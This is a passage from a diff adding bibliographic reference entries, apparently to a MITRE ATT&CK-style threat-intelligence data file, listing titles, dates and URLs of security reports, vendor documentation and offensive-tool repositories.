"source": "MITRE", + "title": "Inline Hooking in Windows" + }, + "related": [], + "uuid": "39ad1769-3dfb-4572-ab82-1e0c4f869ec8", + "value": "HighTech Bridge Inline Hooking Sept 2011" + }, + { + "description": "Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "date_published": "2018-03-31T00:00:00Z", + "refs": [ + "https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html" + ], + "source": "MITRE", + "title": "In-Memory-Only ELF Execution (Without tmpfs)" + }, + "related": [], + "uuid": "402745e1-a65a-4fa1-a86d-99b37221095c", + "value": "Stuart ELF Memory" + }, + { + "description": "ASERT Team. (2018, April 04). Innaput Actors Utilize Remote Access Trojan Since 2016, Presumably Targeting Victim Files. Retrieved July 9, 2018.", + "meta": { + "date_accessed": "2018-07-09T00:00:00Z", + "date_published": "2018-04-04T00:00:00Z", + "refs": [ + "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" + ], + "source": "MITRE", + "title": "Innaput Actors Utilize Remote Access Trojan Since 2016, Presumably Targeting Victim Files" + }, + "related": [], + "uuid": "29c6575f-9e47-48cb-8162-15280002a6d5", + "value": "ASERT InnaputRAT April 2018" + }, + { + "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.", + "meta": { + "date_accessed": "2020-06-22T00:00:00Z", + "date_published": "2020-06-18T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/" + ], + "source": "MITRE", + "title": "Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint" + }, + "related": [], + "uuid": "c249bfcf-25c4-4502-b5a4-17783d581163", + "value": "Microsoft Holmium June 2020" + }, + { + "description": "Klijnsma, Y. (2018, September 11). Inside the Magecart Breach of British Airways: How 22 Lines of Code Claimed 380,000 Victims. Retrieved September 9, 2020.", + "meta": { + "date_accessed": "2020-09-09T00:00:00Z", + "date_published": "2018-09-11T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20181231220607/https://riskiq.com/blog/labs/magecart-british-airways-breach/" + ], + "source": "MITRE", + "title": "Inside the Magecart Breach of British Airways: How 22 Lines of Code Claimed 380,000 Victims" + }, + "related": [], + "uuid": "f6c0f295-c034-4957-8cd9-e2f4b89b5671", + "value": "RiskIQ British Airways September 2018" + }, + { + "description": "Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.", + "meta": { + "date_accessed": "2019-04-22T00:00:00Z", + "date_published": "2018-01-01T00:00:00Z", + "refs": [ + "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf" + ], + "source": "MITRE", + "title": "Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report" + }, + "related": [], + "uuid": "cede4c72-718b-48c2-8a59-1f91555f6cf6", + "value": "Arbor AnnualDoSreport Jan 2018" + }, + { + "description": "O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.", + "meta": { + "date_accessed": "2018-02-15T00:00:00Z", + "date_published": "2017-09-20T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware" + }, + "related": [], + "uuid": "70610469-db0d-45ab-a790-6e56309a39ec", + "value": "FireEye APT33 Sept 2017" + }, + { + "description": "Rich Trouton. (2019, August 9). Installer Package Scripting: Making your deployments easier, one ! at a time. Retrieved September 27, 2022.", + "meta": { + "date_accessed": "2022-09-27T00:00:00Z", + "date_published": "2019-08-09T00:00:00Z", + "refs": [ + "https://cpb-us-e1.wpmucdn.com/sites.psu.edu/dist/4/24696/files/2019/07/psumac2019-345-Installer-Package-Scripting-Making-your-deployments-easier-one-at-a-time.pdf" + ], + "source": "MITRE", + "title": "Installer Package Scripting: Making your deployments easier, one ! at a time" + }, + "related": [], + "uuid": "7a877b67-ac4b-4d82-860a-75b5f0b8daae", + "value": "Installer Package Scripting Rich Trouton" + }, + { + "description": "Microsoft. (n.d.). Installing and Registering a Password Filter DLL. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/ms721766.aspx" + ], + "source": "MITRE", + "title": "Installing and Registering a Password Filter DLL" + }, + "related": [], + "uuid": "6e440b5d-e09a-4d65-b874-2c5babaa609d", + "value": "Microsoft Install Password Filter n.d" + }, + { + "description": "Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021.", + "meta": { + "date_accessed": "2021-04-22T00:00:00Z", + "date_published": "2017-04-20T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test" + ], + "source": "MITRE", + "title": "Installing an Unsigned Driver during Development and Test" + }, + "related": [], + "uuid": "5964ff2e-0860-4e00-8103-89ba6466314c", + "value": "Microsoft Unsigned Driver Apr 2017" + }, + { + "description": "LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.", + "meta": { + "date_accessed": "2019-07-31T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Installutil/" + ], + "source": "MITRE", + "title": "Installutil.exe" + }, + "related": [], + "uuid": "7dfb2c45-862a-4c25-a65a-55abea4b0e44", + "value": "LOLBAS Installutil" + }, + { + "description": "Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.", + "meta": { + "date_accessed": "2016-07-01T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/50614e95.aspx" + ], + "source": "MITRE", + "title": "Installutil.exe (Installer Tool)" + }, + "related": [], + "uuid": "54d962fc-4ca6-4f5f-b383-ec87d711a764", + "value": "MSDN InstallUtil" + }, + { + "description": "Amazon. (n.d.). Instance identity documents. Retrieved April 2, 2021.", + "meta": { + "date_accessed": "2021-04-02T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html" + ], + "source": "MITRE", + "title": "Instance identity documents" + }, + "related": [], + "uuid": "efff0080-59fc-4ba7-ac91-771358f68405", + "value": "AWS Instance Identity Documents" + }, + { + "description": "AWS. (n.d.). Instance Metadata and User Data. Retrieved July 18, 2019.", + "meta": { + "date_accessed": "2019-07-18T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html" + ], + "source": "MITRE", + "title": "Instance Metadata and User Data" + }, + "related": [], + "uuid": "54a17f92-d73d-469f-87b3-34fb633bd9ed", + "value": "AWS Instance Metadata API" + }, + { + "description": "Higashi, Michael. (2018, May 15). Instance Metadata API: A Modern Day Trojan Horse. Retrieved July 16, 2019.", + "meta": { + "date_accessed": "2019-07-16T00:00:00Z", + "date_published": "2018-05-15T00:00:00Z", + "refs": [ + "https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse" + ], + "source": "MITRE", + "title": "Instance Metadata API: A Modern Day Trojan Horse" + }, + "related": [], + "uuid": "f85fa206-d5bf-41fc-a521-01ad6281bee7", + "value": "RedLock Instance Metadata API 2018" + }, + { + "description": "Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020.", + "meta": { + "date_accessed": "2020-08-10T00:00:00Z", + "refs": [ + "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5" + ], + "source": "MITRE", + "title": "Instructions" + }, + "related": [], + "uuid": "f4f89926-71eb-4130-a644-8240d2bab721", + "value": "Nick Tyrer GitHub" + }, + { + "description": "Intel. (2013). Intel Hardware-based Security Technologies for Intelligent Retail Devices. Retrieved May 19, 2020.", + "meta": { + "date_accessed": "2020-05-19T00:00:00Z", + "date_published": "2013-01-01T00:00:00Z", + "refs": [ + "https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/security-technologies-4th-gen-core-retail-paper.pdf" + ], + "source": "MITRE", + "title": "Intel Hardware-based Security Technologies for Intelligent Retail Devices" + }, + "related": [], + "uuid": "bffb9e71-ba97-4010-9ad7-29eb330a350c", + "value": "Intel Hardware-based Security Technologies" + }, + { + "description": "Microsoft. (2017, June 16). Intercepting All Incoming IIS Requests. Retrieved June 3, 2021.", + "meta": { + "date_accessed": "2021-06-03T00:00:00Z", + "date_published": "2017-06-16T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525696(v=vs.90)" + ], + "source": "MITRE", + "title": "Intercepting All Incoming IIS Requests" + }, + "related": [], + "uuid": "7d182eee-eaa8-4b6f-803d-8eb64e338663", + "value": "Microsoft ISAPI Extension All Incoming 2017" + }, + { + "description": "Bialek, J. (2013, September 15). Intercepting Password Changes With Function Hooking. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "date_published": "2013-09-15T00:00:00Z", + "refs": [ + "https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/" + ], + "source": "MITRE", + "title": "Intercepting Password Changes With Function Hooking" + }, + "related": [], + "uuid": "4889912b-4512-45c7-83d3-70ae47c5a4a0", + "value": "Clymb3r Function Hook Passwords Sept 2013" + }, + { + "description": "Microsoft. (n.d.). Internet Control Message Protocol (ICMP) Basics. Retrieved December 1, 2014.", + "meta": { + "date_accessed": "2014-12-01T00:00:00Z", + "refs": [ + "http://support.microsoft.com/KB/170292" + ], + "source": "MITRE", + "title": "Internet Control Message Protocol (ICMP) Basics" + }, + "related": [], + "uuid": "47612548-dad1-4bf3-aa6f-a53aefa06f6a", + "value": "Microsoft ICMP" + }, + { + "description": "N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved March 11, 2022.", + "meta": { + "date_accessed": "2022-03-11T00:00:00Z", + "date_published": "2021-04-01T00:00:00Z", + "refs": [ + "https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them." + ], + "source": "MITRE", + "title": "Inter Process Communication (IPC)" + }, + "related": [], + "uuid": "05293061-ce09-49b5-916a-bb7353acfdfa", + "value": "Linux IPC" + }, + { + "description": "Hananel Livneh. (2022, April 7). Into the Breach: Breaking Down 3 SaaS App Cyber Attacks in 2022. Retrieved May 31, 2022.", + "meta": { + "date_accessed": "2022-05-31T00:00:00Z", + "date_published": "2022-04-07T00:00:00Z", + "refs": [ + "https://thehackernews.com/2022/04/into-breach-breaking-down-3-saas-app.html" + ], + "source": "MITRE", + "title": "Into the Breach: Breaking Down 3 SaaS App Cyber Attacks in 2022" + }, + "related": [], + "uuid": "e4ff75cd-b8fd-4fba-a2da-379a073003ab", + "value": "HackerNews - 3 SaaS App Cyber Attacks - April 2022" + }, + { + "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.", + "meta": { + "date_accessed": "2020-05-26T00:00:00Z", + "date_published": "2020-05-07T00:00:00Z", + "refs": [ + "https://redcanary.com/blog/blue-mockingbird-cryptominer/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Introducing Blue Mockingbird" + }, + "related": [], + "uuid": "596bfbb3-72e0-4d4c-a1a9-b8d54455ffd0", + "value": "RedCanary Mockingbird May 2020" + }, + { + "description": "Fidelis Threat Research Team. (2016, January 27). Introducing Hi-Zor RAT. Retrieved March 24, 2016.", + "meta": { + "date_accessed": "2016-03-24T00:00:00Z", + "date_published": "2016-01-27T00:00:00Z", + "refs": [ + "https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/" + ], + "source": "MITRE", + "title": "Introducing Hi-Zor RAT" + }, + "related": [], + "uuid": "0c9ff201-283a-4527-8cb8-6f0d05a4f724", + "value": "Fidelis Hi-Zor" + }, + { + "description": "Dirk-jan Mollema. (2020, April 16). Introducing ROADtools - The Azure AD exploration framework. Retrieved January 31, 2022.", + "meta": { + "date_accessed": "2022-01-31T00:00:00Z", + "date_published": "2020-04-16T00:00:00Z", + "refs": [ + "https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/" + ], + "source": "MITRE", + "title": "Introducing ROADtools - The Azure AD exploration framework" + }, + "related": [], + "uuid": "803f3512-1831-4535-8b16-b89fae20f944", + "value": "Roadtools" + }, + { + "description": "Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.", + "meta": { + "date_accessed": "2018-05-21T00:00:00Z", + "date_published": "2017-04-03T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2017/04/introducing-rokrat.html" + ], + "source": "MITRE", + "title": "Introducing ROKRAT" + }, + "related": [], + "uuid": "1bd78a2f-2bc6-426f-ac9f-16bf3fdf4cdf", + "value": "Talos ROKRAT" + }, + { + "description": "Microsoft. (2014, July 9). Introducing the Office (2007) Open XML File Formats. Retrieved July 20, 2018.", + "meta": { + "date_accessed": "2018-07-20T00:00:00Z", + "date_published": "2014-07-09T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)" + ], + "source": "MITRE", + "title": "Introducing the Office (2007) Open XML File Formats" + }, + "related": [], + "uuid": "8145f894-6477-4629-81de-1dd26070ee0a", + "value": "Microsoft Open XML July 2017" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.", + "meta": { + "date_accessed": "2017-09-21T00:00:00Z", + "date_published": "2017-08-30T00:00:00Z", + "refs": [ + "https://securelist.com/introducing-whitebear/81638/" + ], + "source": "MITRE", + "title": "Introducing WhiteBear" + }, + "related": [], + "uuid": "44626060-3d9b-480e-b4ea-7dac27878e5e", + "value": "Securelist WhiteBear Aug 2017" + }, + { + "description": "Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.", + "meta": { + "date_accessed": "2018-03-21T00:00:00Z", + "date_published": "2015-07-22T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/" + ], + "source": "MITRE", + "title": "Introduction to Alternate Data Streams" + }, + "related": [], + "uuid": "b552cf89-1880-48de-9088-c755c38821c1", + "value": "MalwareBytes ADS July 2015" + }, + { + "description": "Apple. (2016, January 25). Introduction to AppleScript Language Guide. Retrieved March 28, 2020.", + "meta": { + "date_accessed": "2020-03-28T00:00:00Z", + "date_published": "2016-01-25T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html" + ], + "source": "MITRE", + "title": "Introduction to AppleScript Language Guide" + }, + "related": [], + "uuid": "b23abcb8-3004-4a42-8ada-58cdbd65e171", + "value": "Apple AppleScript" + }, + { + "description": "Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and .ost). Retrieved February 19, 2020.", + "meta": { + "date_accessed": "2020-02-19T00:00:00Z", + "refs": [ + "https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790" + ], + "source": "MITRE", + "title": "Introduction to Outlook Data Files (.pst and .ost)" + }, + "related": [], + "uuid": "29f4cc6b-1fa5-434d-ab4f-6bb169e2287a", + "value": "Microsoft Outlook Files" + }, + { + "description": "Microsoft. (2023, June 26). Introduction to print processors. Retrieved September 27, 2023.", + "meta": { + "date_accessed": "2023-09-27T00:00:00Z", + "date_published": "2023-06-26T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/windows-hardware/drivers/print/introduction-to-print-processors" + ], + "source": "MITRE", + "title": "Introduction to print processors" + }, + "related": [], + "uuid": "ba04b0d0-1c39-5f48-824c-110ee7affbf3", + "value": "Microsoft Intro Print Processors" + }, + { + "description": "Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2017-03-30T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications" + ], + "source": "MITRE", + "title": "Introduction to Windows Service Applications" + }, + "related": [], + "uuid": "444c8983-47ef-45b4-a3a6-5566f4fa2732", + "value": "Microsoft Services" + }, + { + "description": "Lambert, T. (2020, January 29). Intro to Netwire. Retrieved January 7, 2021.", + "meta": { + "date_accessed": "2021-01-07T00:00:00Z", + "date_published": "2020-01-29T00:00:00Z", + "refs": [ + "https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/" + ], + "source": "MITRE", + "title": "Intro to Netwire" + }, + "related": [], + "uuid": "563249e1-edda-48fc-ac90-f198dd71619e", + "value": "Red Canary NETWIRE January 2020" + }, + { + "description": "D. (n.d.). Intro to Webhooks. Retrieved July 20, 2023.", + "meta": { + "date_accessed": "2023-07-20T00:00:00Z", + "refs": [ + "https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks" + ], + "source": "MITRE", + "title": "Intro to Webhooks" + }, + "related": [], + "uuid": "bf5b3773-29cc-539a-a0f0-a6d1d63dee2d", + "value": "Discord Intro to Webhooks" + }, + { + "description": "Robertson, K. (2015, April 2). Inveigh: Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. Retrieved March 11, 2019.", + "meta": { + "date_accessed": "2019-03-11T00:00:00Z", + "date_published": "2015-04-02T00:00:00Z", + "refs": [ + "https://github.com/Kevin-Robertson/Inveigh" + ], + "source": "MITRE", + "title": "Inveigh: Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool" + }, + "related": [], + "uuid": "cca306e5-f9da-4782-a06f-ba3ad70e34ca", + "value": "GitHub Inveigh" + }, + { + "description": "Piper, S.. (2018, September 24). Investigating Malicious AMIs. Retrieved March 30, 2021.", + "meta": { + "date_accessed": "2021-03-30T00:00:00Z", + "date_published": "2018-09-24T00:00:00Z", + "refs": [ + "https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/" + ], + "source": "MITRE", + "title": "Investigating Malicious AMIs" + }, + "related": [], + "uuid": "e93e16fc-4ae4-4f1f-9d80-dc48c1c30e25", + "value": "Summit Route Malicious AMIs" + }, + { + "description": "Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021.", + "meta": { + "date_accessed": "2021-12-01T00:00:00Z", + "date_published": "2014-07-16T00:00:00Z", + "refs": [ + "https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/" + ], + "source": "MITRE", + "title": "Investigating PowerShell Attacks" + }, + "related": [], + "uuid": "07d9d2c6-dd79-42a5-9024-ba0e66b1913b", + "value": "inv_ps_attacks" + }, + { + "description": "Kazanciyan, R. & Hastings, M. (2014). Defcon 22 Presentation. Investigating PowerShell Attacks [slides]. Retrieved November 3, 2014.", + "meta": { + "date_accessed": "2014-11-03T00:00:00Z", + "refs": [ + "https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf" + ], + "source": "MITRE", + "title": "Investigating PowerShell Attacks [slides]" + }, + "related": [], + "uuid": "bd3f04cd-04ef-41f0-9a15-d9f0a3ed1db9", + "value": "Kazanciyan 2014" + }, + { + "description": "Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved February 22, 2021.", + "meta": { + "date_accessed": "2021-02-22T00:00:00Z", + "date_published": "2020-12-03T00:00:00Z", + "refs": [ + "https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316" + ], + "source": "MITRE", + "title": "Investigating the Use of VHD Files By Cybercriminals" + }, + "related": [], + "uuid": "7a1131ab-e4b1-4569-8e28-3650312cc804", + "value": "Beek Use of VHD Dec 2020" + }, + { + "description": "Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", + "meta": { + "date_accessed": "2018-07-10T00:00:00Z", + "date_published": "2018-06-07T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + ], + "source": "MITRE", + "title": "InvisiMole: Surprisingly equipped spyware, undercover since 2013" + }, + "related": [], + "uuid": "629fa1d8-06cb-405c-a2f7-c511b54cd727", + "value": "ESET InvisiMole June 2018" + }, + { + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.", + "meta": { + "date_accessed": "2020-07-16T00:00:00Z", + "date_published": "2020-06-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" + ], + "source": "MITRE", + "title": "INVISIMOLE: THE HIDDEN PART OF THE STORY" + }, + "related": [], + "uuid": "d10cfda8-8fd8-4ada-8c61-dba6065b0bac", + "value": "ESET InvisiMole June 2020" + }, + { + "description": "Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, 2020.", + "meta": { + "date_accessed": "2020-06-24T00:00:00Z", + "date_published": "2019-08-19T00:00:00Z", + "refs": [ + "https://github.com/OmerYa/Invisi-Shell" + ], + "source": "MITRE", + "title": "Invisi-Shell" + }, + "related": [], + "uuid": "26c1b8f4-ff59-409e-b616-04eee38a8a9f", + "value": "GitHub OmerYa Invisi-Shell" + }, + { + "description": "Bohannon, D. (2018, March 19). Invoke-DOSfuscation. Retrieved March 17, 2023.", + "meta": { + "date_accessed": "2023-03-17T00:00:00Z", + "date_published": "2018-03-19T00:00:00Z", + "refs": [ + "https://github.com/danielbohannon/Invoke-DOSfuscation" + ], + "source": "MITRE", + "title": "Invoke-DOSfuscation" + }, + "related": [], + "uuid": "d2f7fe4a-1a3a-5b26-8247-4f05c96974bf", + "value": "Invoke-DOSfuscation" + }, + { + "description": "Schroeder, W. & Hart M. (2016, October 31). Invoke-Kerberoast. Retrieved March 23, 2018.", + "meta": { + "date_accessed": "2018-03-23T00:00:00Z", + "date_published": "2016-10-31T00:00:00Z", + "refs": [ + "https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/" + ], + "source": "MITRE", + "title": "Invoke-Kerberoast" + }, + "related": [], + "uuid": "8db88e6f-3d45-4896-87e9-75b24c8628f3", + "value": "PowerSploit Invoke Kerberoast" + }, + { + "description": "EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved March 22, 2018.", + "meta": { + "date_accessed": "2018-03-22T00:00:00Z", + "date_published": "2016-10-31T00:00:00Z", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1" + ], + "source": "MITRE", + "title": "Invoke-Kerberoast.ps1" + }, + "related": [], + "uuid": "a358bf8f-166e-4726-adfd-415e953d4ffe", + "value": "Empire InvokeKerberoast Oct 2016" + }, + { + "description": "Bialek, J. (2015, December 16). Invoke-NinjaCopy.ps1. Retrieved June 2, 2016.", + "meta": { + "date_accessed": "2016-06-02T00:00:00Z", + "date_published": "2015-12-16T00:00:00Z", + "refs": [ + "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1" + ], + "source": "MITRE", + "title": "Invoke-NinjaCopy.ps1" + }, + "related": [], + "uuid": "e92aed6b-348b-4dab-8292-fee0698e4a85", + "value": "Github PowerSploit Ninjacopy" + }, + { + "description": "Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved March 17, 2023.", + "meta": { + "date_accessed": "2023-03-17T00:00:00Z", + "date_published": "2016-09-24T00:00:00Z", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation" + ], + "source": "MITRE", + "title": "Invoke-Obfuscation" + }, + "related": [], + "uuid": "4cc6a80f-d758-524b-9519-5b839d4918bd", + "value": "Invoke-Obfuscation" + }, + { + "description": "Bohannon, D.. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.", + "meta": { + "date_accessed": "2017-06-18T00:00:00Z", + "date_published": "2017-03-13T00:00:00Z", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation" + ], + "source": "MITRE", + "title": "Invoke-Obfuscation - PowerShell Obfuscator" + }, + "related": [], + "uuid": "956b3d80-4e19-4cab-a65f-ad86f233aa12", + "value": "GitHub Invoke-Obfuscation" + }, + { + "description": "Barrett Adams . (n.d.). Invoke-PSImage . Retrieved September 30, 2022.", + "meta": { + "date_accessed": "2022-09-30T00:00:00Z", + "refs": [ + "https://github.com/peewpw/Invoke-PSImage" + ], + "source": "MITRE", + "title": "Invoke-PSImage" + }, + "related": [], + "uuid": "449c873c-c5af-45b8-8bd7-505d2181a05c", + "value": "GitHub PSImage" + }, + { + "description": "Adams, B. (2017, December 17). Invoke-PSImage. Retrieved April 10, 2018.", + "meta": { + "date_accessed": "2018-04-10T00:00:00Z", + "date_published": "2017-12-17T00:00:00Z", + "refs": [ + "https://github.com/peewpw/Invoke-PSImage" + ], + "source": "MITRE", + "title": "Invoke-PSImage" + }, + "related": [], + "uuid": "dd210b79-bd5f-4282-9542-4d1ae2f16438", + "value": "GitHub Invoke-PSImage" + }, + { + "description": "Xen. (n.d.). In Wikipedia. Retrieved November 13, 2014.", + "meta": { + "date_accessed": "2014-11-13T00:00:00Z", + "refs": [ + "http://en.wikipedia.org/wiki/Xen" + ], + "source": "MITRE", + "title": "In Wikipedia" + }, + "related": [], + "uuid": "4ce05edd-da25-4559-8489-b78cdd2c0f3d", + "value": "Wikipedia Xen" + }, + { + "description": "Microsoft. (n.d.). Ipconfig. Retrieved April 17, 2016.", + "meta": { + "date_accessed": "2016-04-17T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/bb490921.aspx" + ], + "source": "MITRE", + "title": "Ipconfig" + }, + "related": [], + "uuid": "8a6e6f59-70fb-48bf-96d2-318dd92df995", + "value": "TechNet Ipconfig" + }, + { + "description": "Cisco. (2021, August 23). ip ssh pubkey-chain. Retrieved July 13, 2022.", + "meta": { + "date_accessed": "2022-07-13T00:00:00Z", + "date_published": "2021-08-23T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp1254331478" + ], + "source": "MITRE", + "title": "ip ssh pubkey-chain" + }, + "related": [], + "uuid": "c6ffe974-f304-598c-bc4d-5da607c73802", + "value": "cisco_ip_ssh_pubkey_ch_cmd" + }, + { + "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.", + "meta": { + "date_accessed": "2019-04-17T00:00:00Z", + "date_published": "2015-12-07T00:00:00Z", + "refs": [ + "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets" + ], + "source": "MITRE", + "title": "Iran-based attackers use back door threats to spy on Middle Eastern targets" + }, + "related": [], + "uuid": "0a6166a3-5649-4117-97f4-7b8b5b559929", + "value": "Symantec Chafer Dec 2015" + }, + { + "description": "CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020.", + "meta": { + "date_accessed": "2020-12-21T00:00:00Z", + "date_published": "2020-09-15T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa20-259a" + ], + "source": "MITRE", + "title": "Iran-Based Threat Actor Exploits VPN Vulnerabilities" + }, + "related": [], + "uuid": "1bbc9446-9214-4fcd-bc7c-bf528370b4f8", + "value": "CISA AA20-259A Iran-Based Actor September 2020" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2020, November 3). Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data. Retrieved October 25, 2023.", + "meta": { + "date_accessed": "2023-10-25T00:00:00Z", + "date_published": "2020-11-03T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-304a" + ], + "source": "Tidal Cyber", + "title": "Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data" + }, + "related": [], + "uuid": "be89be75-c33f-4c58-8bf0-979c1debaad7", + "value": "U.S. CISA Iran Voter Data November 3 2020" + }, + { + "description": "ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.", + "meta": { + "date_accessed": "2020-05-14T00:00:00Z", + "date_published": "2019-06-01T00:00:00Z", + "refs": [ + "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf" + ], + "source": "MITRE", + "title": "Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal" + }, + "related": [], + "uuid": "9789d60b-a417-42dc-b690-24ccb77b8658", + "value": "ClearSky MuddyWater June 2019" + }, + { + "description": "Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.", + "meta": { + "date_accessed": "2022-06-22T00:00:00Z", + "date_published": "2022-01-31T00:00:00Z", + "refs": [ + 